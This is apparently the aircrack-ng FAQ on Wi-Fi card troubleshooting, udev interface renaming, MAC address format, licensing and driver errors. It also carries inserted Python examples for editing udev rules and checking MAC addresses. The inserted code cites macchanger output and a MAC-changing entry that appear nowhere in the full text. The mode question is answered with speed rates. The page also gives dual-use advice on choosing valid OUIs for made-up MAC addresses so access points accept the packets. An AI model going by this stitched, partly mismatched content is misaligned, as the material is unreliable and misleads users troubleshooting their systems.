Problem: The wireless card behaves badly if the signal is too strong. If you are too close (1-2m) to the access point, you get high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s.

This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

So, is it a driver problem or is it my network hardware?

Neither, really. It's a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when you're close to the access point. If you don't want or you don't have a wire, you can also decrease output power of your Access point or your card.
How do I download and compile aircrack-ng?

See the wiki home page for links to the relevant sub-pages.
The driver won't compile

This usually happens because the linux headers don't match your current running kernel. In this situation, grab the kernel sources or just recompile a fresh kernel, install it and reboot. Then, try again compiling the driver. See this HOWTO for more details about kernel compilation.
Why do I get ioctl(SIOCGIFINDEX) failed: No such device ?

Double check that your device name is correct and that you haven't forgotten a parameter on the command line.

When using linux-wlan-ng driver, be sure to enable the interface first with airmon-ng.
Why do I get 'SIOCSIFFLAGS : No such file or directory' error message

Some drivers require a firmware to be loaded (b43, prism54, zd1211rw and others). The driver typically loads the firmware itself when started.
In this case, the driver didn't find it because the firmware was not in the right place or is missing from the computer. To find the firmware's correct location, read the driver documentation.
Why does my computer lock up when injecting packets ? Is there a solution?

See Airmon-ng arpreplay functions freeze with rt2x00 & rt2570 1.4.0 (wusb54g) in the Forum.
Is VMware supported?

Yes, the aircrack-ng suite has successfully been run under VMware. One caveat with VMware: you can't use PCMCIA or PCI cards. You can ONLY use compatible USB wireless cards. Some limited additional information is available here:

    VMWare tips and tricks

Kali is available as a virtual machine.
What other tips do you have?

Various tips
Windows GUI Error message

Running the Windows GUI gives an error message similar to "The application failed to initialize properly (0xc0000135). Click on OK to terminate the application." To correct this, ensure you have the Microsoft .NET framework 2.0 installed.
My network card changes its name from eth0 to eth1

Or even to eth2, or from wlan0 to wlan1, and so on. You know what the symptoms mean if you suffer from this problem. This happens when you change your MAC address and udev thinks it has detected a new network card. udev keeps track of this, so your network card naming stays mixed up even after a reboot.

Solution: Disable this function in UDEV

Open /etc/udev/persistent-net-generator.rules in your preferred text editor

Search for

 KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 	IMPORT{program}="write_net_rules $attr{address}"

and change it to

 #KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 #	IMPORT{program}="write_net_rules $attr{address}"

Save and close.

Open /etc/udev/rules.d/z25_persistent-net.rules in your preferred text editor (z25_ may be something different on your system).

Search for the lines concerning your network card and delete them, or just disable them by inserting a leading #.

Reboot and everything should be back to normal and stay there.

Note: If you update udev to a newer revision you may have to do this again.
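The two file edits above can be scripted. The following Python is an added example (not part of the aircrack-ng documentation) that applies them to the text of the two rules files: it comments out the write_net_rules rule together with its backslash-continued KERNEL== line, and comments out any rule in the persistent rules file whose ATTR{address} matches the card you name. The sample file contents are constructed; the MAC addresses reuse values shown earlier on this page, while the PCI ids and driver names are placeholders.

```python
import re

# Constructed sample of /etc/udev/persistent-net-generator.rules: the rule the
# text above says to comment out, with its backslash continuation line.
GENERATOR_RULES = (
    '# do not edit this file, it will be overwritten on update\n'
    'ACTION!="add", GOTO="persistent_net_generator_end"\n'
    'KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\\\n'
    '\tIMPORT{program}="write_net_rules $attr{address}"\n'
    'LABEL="persistent_net_generator_end"\n'
)

# Constructed sample of /etc/udev/rules.d/z25_persistent-net.rules with two
# cards; the PCI ids and driver names are placeholders made up for this example.
PERSISTENT_RULES = (
    '# PCI device 0x1234:0x5678 (wiredrv)\n'
    'SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", '
    'ATTR{address}=="00:11:22:33:44:55", KERNEL=="eth*", NAME="eth0"\n'
    '\n'
    '# PCI device 0x1234:0x9abc (wifidrv)\n'
    'SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", '
    'ATTR{address}=="00:0f:b5:88:ac:82", KERNEL=="wlan*", NAME="wlan0"\n'
)

_ADDR_RE = re.compile(r'ATTR\{address\}=="([0-9A-Fa-f:]{17})"')


def _commented(line):
    return line.lstrip().startswith("#")


def disable_generator_rule(text):
    """Comment out the write_net_rules IMPORT rule, including the KERNEL==
    line before it that ends with a backslash continuation. Idempotent."""
    lines = text.splitlines(keepends=True)
    out = []
    for i, line in enumerate(lines):
        is_import = "write_net_rules" in line
        continues_into_import = (line.rstrip("\r\n").endswith("\\")
                                 and i + 1 < len(lines)
                                 and "write_net_rules" in lines[i + 1])
        if (is_import or continues_into_import) and not _commented(line):
            out.append("#" + line)
        else:
            out.append(line)
    return "".join(out)


def disable_rules_for_mac(text, mac):
    """Comment out every persistent-net rule whose ATTR{address} is mac
    (compared case-insensitively); other cards' rules are left untouched."""
    wanted = mac.lower()
    out = []
    for line in text.splitlines(keepends=True):
        m = _ADDR_RE.search(line)
        if m and m.group(1).lower() == wanted and not _commented(line):
            out.append("#" + line)
        else:
            out.append(line)
    return "".join(out)


if __name__ == "__main__":
    print(disable_generator_rule(GENERATOR_RULES))
    print(disable_rules_for_mac(PERSISTENT_RULES, "00:0F:B5:88:AC:82"))
```

To apply it to the real files, read them, pass the text through these functions and write the result back as root, then reboot as the entry describes.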
What is the format of a valid MAC address ?

A normal MAC address looks like this: 00:09:5B:EC:EE:F2. It is composed of six octets. The first half (00:09:5B) of each MAC address is known as the Organizationally Unique Identifier (OUI). Simply put, it is the card manufacturer. The second half (EC:EE:F2) is known as the extension identifier and is unique to each network card within the specific OUI. Many access points will ignore MAC addresses with invalid OUIs. So make sure you use a valid OUI code when you make up MAC addresses. Otherwise, your packets may be ignored by the Access Point. The current list of OUIs may be found here.

Make sure that the least significant bit of the first octet is 0. This corresponds to unicast addresses. If it is set to 1, this indicates a group address, which is normally used exclusively by multicast traffic. MAC addresses with a multicast source are invalid and will be dropped.

    Examples of valid OUIs: 00:1B:23, 08:14:43, AA:00:04, because the last hex digit of the first octet (0, 8 and A) is even, so its low bit is 0
    Examples of invalid OUIs: 01:1B:23, 03:23:32, because 1 and 3 are odd, so the low bit is 1

In particular, it is recommended that the first octet is 00.
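As an added example (not from the aircrack-ng project), here is a small Python checker that applies the rules from this entry and from the Troubleshooting Tip in the MAC-changing entry above: it validates the six-octet format, rejects addresses whose first octet has the group bit set, extracts the OUI and looks it up in a constructed two-entry vendor table taken from the macchanger output earlier on this page, and notes when the first octet is not 00.

```python
import re

# Six hex octets separated by ":" or "-", e.g. 00:09:5B:EC:EE:F2
_MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([:-])(?:[0-9A-Fa-f]{2}\1){4}[0-9A-Fa-f]{2}$")

# Constructed excerpt of the IEEE OUI list, using only the two vendors shown in
# the macchanger output earlier on this page; the full list is linked in the text.
OUI_VENDORS = {
    "00:0F:B5": "Netgear Inc",
    "00:B0:80": "Mannesmann Ipulsys B.v.",
}


def parse_mac(mac):
    """Return the six octets as ints, or raise ValueError for a malformed string."""
    s = mac.strip()
    m = _MAC_RE.match(s)
    if not m:
        raise ValueError("malformed MAC address: %r" % mac)
    return [int(x, 16) for x in s.split(m.group(1))]


def oui(mac):
    """First three octets (the OUI), normalised to upper-case colon form."""
    return "%02X:%02X:%02X" % tuple(parse_mac(mac)[:3])


def is_group_address(mac):
    """True if the I/G bit (least significant bit of the first octet) is set,
    i.e. the address is multicast/broadcast and invalid as a frame source."""
    return bool(parse_mac(mac)[0] & 0x01)


def check_source_mac(mac):
    """Classify a candidate source MAC the way the FAQ entry describes.

    Returns (usable, notes): usable is False when the address is malformed or
    has the group bit set; notes explains why, plus advisory remarks (OUI not
    in the local table, first octet other than 00) that do not by themselves
    make the address unusable.
    """
    notes = []
    try:
        octets = parse_mac(mac)
    except ValueError as exc:
        return False, [str(exc)]
    first = octets[0]
    if first & 0x01:
        notes.append("first octet %02X has the group bit set (multicast): "
                     "invalid as a source, frames will be dropped" % first)
        return False, notes
    vendor = OUI_VENDORS.get(oui(mac))
    if vendor is None:
        notes.append("OUI %s not in the local vendor excerpt; check it against "
                     "the IEEE list, as APs may ignore unknown OUIs" % oui(mac))
    else:
        notes.append("OUI %s belongs to %s" % (oui(mac), vendor))
    if first != 0x00:
        notes.append("first octet is %02X; the FAQ recommends 00" % first)
    return True, notes


if __name__ == "__main__":
    for candidate in ["00:09:5B:EC:EE:F2", "00:0F:B5:88:AC:82",
                      "01:1B:23:00:00:01", "AA:00:04:11:22:33", "00:11:22:33:44"]:
        usable, notes = check_source_mac(candidate)
        print("%-20s usable=%s" % (candidate, usable))
        for n in notes:
            print("    - " + n)
```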
What is ARP ?

The address resolution protocol (ARP) is explained in more detail here.
Is Mac OS X supported?

The aircrack-ng suite has limited Mac OS X support. Currently it only supports the following tools: aircrack-ng, packetforge-ng, ivstools and makeivs. Any program which requires opening a wireless interface is not supported.
What is RSSI?

RSSI means Received Signal Strength Indication. RSSI is a measurement of the received radio signal strength. It is the received signal strength in a wireless environment, in arbitrary units.

For more information, see https://en.wikipedia.org/wiki/RSSI
What is the difference with long and short preamble?

Every packet is sent with a preamble, which is just a known pattern of bits at the beginning of the packet so that the receiver can sync up and be ready for the real data. This preamble must be sent at the basic rate (1 Mbps), according to the official standard. But there are two different kinds of preambles, short and long. The long preamble has a field size of 128 bits, while the short preamble is only 56 bits.
Will I get better range with maximum output power?

No, this is a false assumption in most situations.

In a home environment, the best output power is not always the maximum. In most situations, 30mw is enough. However, if you are a long distance from the AP, then yes, maximum output power is the best.
Do wifi amplifiers have a better range?

No, amplifiers are not a very good idea because:

    Amplifiers also amplify noise and that's not a good thing for link quality
    With high amplification, you could get a headache

You are much better off purchasing a good antenna with high gain.
My card says that I have 20dBm (100mW) but I only have 18dBm, why?

Most cards have 100mW when combined with the antenna (2dBi antenna).

In 802.11a and 802.11g, the output power is 30mW due to modulation (it's a bit harder to use OFDM than CCK)
Will I have better reception with stronger transmit power?

No, the transmit power is not linked with receiving at all. For receiving, you should check the receive sensitivity of your card. As well, you are much better off purchasing a good antenna with high gain.
How do I choose an antenna?

You should see Antenna help, Selecting a Wifi Antenna.
How Do I Put My Card Back Into Managed Mode

See airmon-ng documentation.
How Do I Check What Mode My Card Is In?

Use iwconfig to view the current speed setting of the wireless card: 1, 2, 5.5 and 11Mbit are 802.11b; 6, 9, 12, 18, 24, 36, 48 and 54Mbit are 802.11a/g; anything above 54Mbit is 802.11n.
How Do I Add a New USB Device ID to My Driver?

If you have a very new USB device, sometimes the device ID has not been included in the driver. The following article describes how to do this for a specific driver. The technique can be used for all USB drivers.

Adding new device IDs to zd1211rw
Why do I get "Error creating tap interface: Permission denied" or a similar message?

You receive one or both of the following errors:

 error creating tap interface: Permission denied
 error opening tap device: Permission denied

This is caused by SELinux (Security Enhanced Linux) preventing the interface from starting. To resolve, disable SELinux. See the support forums for your particular linux to determine how to do this.
Why airodump-ng doesn't display anything on Android terminal?

By default, the terminal reports 0 rows and 0 columns to stty, so airodump-ng has no screen area to draw on. Set them explicitly, for example:

    stty columns 86
    stty rows 39

How much does Aircrack-ng cost?

Aircrack-ng is free software; you can download it without paying any license fee. The version of Aircrack-ng you download isn't a demo version, with limitations not present in a full version; it is the full version. The license under which Aircrack-ng is issued is mostly the GNU General Public License version 2. See the GNU GPL FAQ for some more information.

You may also want to check out the OpenSSL license included in our source code download.
But I just paid someone on eBay for a copy of Aircrack-ng! Did I get ripped off?

That depends. Did they provide any sort of value-added product or service, such as installation support, installation media, training, trace file analysis, or funky-colored socks? Probably not. Aircrack-ng is available for anyone to download, absolutely free, at any time. Paying for a copy implies that you should get something for your money.
Can I use Aircrack-ng commercially?

Yes, if, for example, you mean "I work for a commercial organization; can I use Aircrack-ng to capture and assess WiFi network security in our company's networks or in our customers' networks?"

If you mean "Can I use Aircrack-ng as part of my commercial product?", see the next entry in the FAQ.
Can I use Aircrack-ng as part of my commercial product?

As noted, Aircrack-ng is licensed under the GNU General Public License, version 2. The GPL imposes conditions on your use of GPL'ed code in your own products; you cannot, for example, make a derived work from Aircrack-ng, by making modifications to it, and then sell the resulting derived work and not allow recipients to give away the resulting work. You must also make the changes you've made to the Aircrack-ng source available to all recipients of your modified version; those changes must also be licensed under the terms of the GPL. See the GPL FAQ for more details; in particular, note the answer to the question about modifying a GPLed program and selling it commercially, and the question about linking GPLed code with other code to make a proprietary program. You can combine a GPLed program such as Aircrack-ng and a commercial program as long as they communicate at arm's length, as per this item in the GPL FAQ.

We recommend keeping Aircrack-ng and your product completely separate.

You may also want to check out the OpenSSL license included in our source code download.
Can I take screenshots of Aircrack-ng and use them in my own publications?

Yes. As long as you take the screenshots yourself. If you are using someone else's, you may need to obtain their authorization to use them.
How do I deal with rfkill hard blocks?

A hard block usually is a physical switch on the computer. It can either be a flip switch on the side of the computer, a key combination to press on the keyboard or a setting to enable in the BIOS.

In some cases, if wireless was disabled before Windows was powered off, it will appear like a hard block and the trick is to enable wireless in Windows then reboot.
"ath10k_pci 0000:03:00.0: firmware: failed to load ath10k/pre-cal-pci-0000:03:00.0.bin" and similar in dmesg

TL;DR: even if it sounds bad, don't worry about it.

If firmware is missing, your card won't work at all: no interface, no scanning, no other function. Firmware may have issues or bugs, but that's a different story.

On desktop/laptop cards, the above mentioned file is stored in a dedicated EEPROM on the card itself, so it's not needed. That data is typically only needed on embedded devices, such as routers or APs, that lack the EEPROM, and in that case it is stored on the filesystem. The reason is that it is cheaper to store the data there than to add extra components.

The driver doesn't have any way of knowing if the card has it or not, so it is displaying the message anyway.
Why does using aircrack-ng with "-p 1" use 2 CPUs

The -p parameter controls the number of threads used for bruteforcing the passphrase; Aircrack-ng has other tasks that use the CPU as well.
"device descriptor read/64, error -110" with Ralink rt28xx driver in dmesg

Prior to this message, it can be seen that the device connected on a USB port with xhci_hcd, indicating USB 3.0.

This issue happens mostly in virtual machines, when the USB port is set to 3.0. To work around the issue, power off the virtual machine, edit USB settings of the VM and set it to 2.0.
"xhci_hcd 0000:15:00.0: WARN Set TR Deq Ptr cmd failed due to incorrect slot or ep state" or similar in dmesg

The following may be present in dmesg instead:

xhci_hcd 0000:00:14.0: WARN Cannot submit Set TR Deq Ptr
xhci_hcd 0000:00:14.0: A Set TR Deq Ptr command is pending.

For mt76x0u, you may see any of the following messages as well:

mt76x0u 1-1:1.0: rx urb failed: -71
mt7601u 1-2:1.0: Error: mt7601u_mcu_wait_resp timed out
mt7601u 1-2:1.0: Vendor request req:07 off:0080 failed:-71
mt7601u: probe of 1-2:1.0 failed with error -110

And for rt2800usb:

rt2x00usb_vendor_request: Error - Vendor Request 0x06 failed for offset 0x0404 with error -71
rt2800_wait_csr_ready: Error - Unstable hardware
rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)

This bug affects kernels >= 4.20. It happens mostly when connecting certain USB 2.0 devices to a USB 3.0 port, but it can happen with USB 3.0 devices as well. It isn't the WiFi adapter driver's fault, but an issue in the USB subsystem code.

Until the bug is fixed, the workaround for USB 2.0 devices is to plug the device on a USB 2.0 port. If you are using a virtual machine, power off the virtual machine, and change USB port settings to 2.0.
Where can I find airmon-ng on Windows or MacOS?

airmon-ng is a Linux/FreeBSD script only. There is no version for Windows, MacOS, or other OS at this time.
My driver doesn't work anymore, or it does something weird, how to debug?

We are assuming it used to work in the past, and that you have checked that network managers were killed prior to putting the card in monitor mode.

The next step would be to look into 'dmesg' to see if the driver outputs any error or warnings. If the card is USB, clearing it using 'dmesg -c' before plugging the adapter may help, by decreasing the amount of messages you have to go through.

################################################################